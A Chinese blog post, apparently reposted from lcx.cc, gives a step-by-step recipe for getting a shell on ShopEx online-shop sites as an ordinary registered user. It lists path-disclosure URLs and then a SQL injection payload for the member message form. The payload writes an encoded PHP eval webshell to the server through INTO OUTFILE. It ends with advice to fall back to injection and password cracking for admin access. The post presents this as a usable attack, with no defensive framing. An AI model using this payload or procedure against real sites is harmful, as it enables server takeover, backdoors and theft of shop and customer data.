shopex 前台普通用户 getshell 漏洞

  • A+
所属分类:lcx

利用方法:

第一个:

想办法找到目标网站的绝对路径

http://www.test.com/install/svinfo.php?phpinfo=true
http://www.test.com/core/api/shop_api.php
http://www.test.com/core/api/site/2.0/api_b2b_2_0_cat.php
http://www.test.com/core/api/site/2.0/api_b2b_2_0_goodstype.php
http://www.test.com/core/api/site/2.0/api_b2b_2_0_brand.php

shopex存在很多爆路径的漏洞,请自行研究。

第二个:

注册一个普通用户

http://www.test.com/?passport-signup.html

第三个:

发送消息

http://www.test.com/?member-send.html

shopex 前台普通用户 getshell 漏洞

代码

wooyun.in' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。

如果无法getshell的话,也可以尝试注入,破密码进后台也一样

shell图

shopex 前台普通用户 getshell 漏洞

文章来源于lcx.cc:shopex 前台普通用户 getshell 漏洞

相关推荐: 揭秘乌云网:中国最大的黑客培训基地?

10月10日,如家等酒店开房信息泄露;10月29日,来往被指存漏洞波及支付宝;11月5日,搜狗浏览器被曝存在重大安全漏洞;11月20日,腾讯7000万QQ群用户数据被指泄露;11月26日,360出现任意用户修改密码漏洞;甚至连相关部门网站漏洞也被公布....。…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: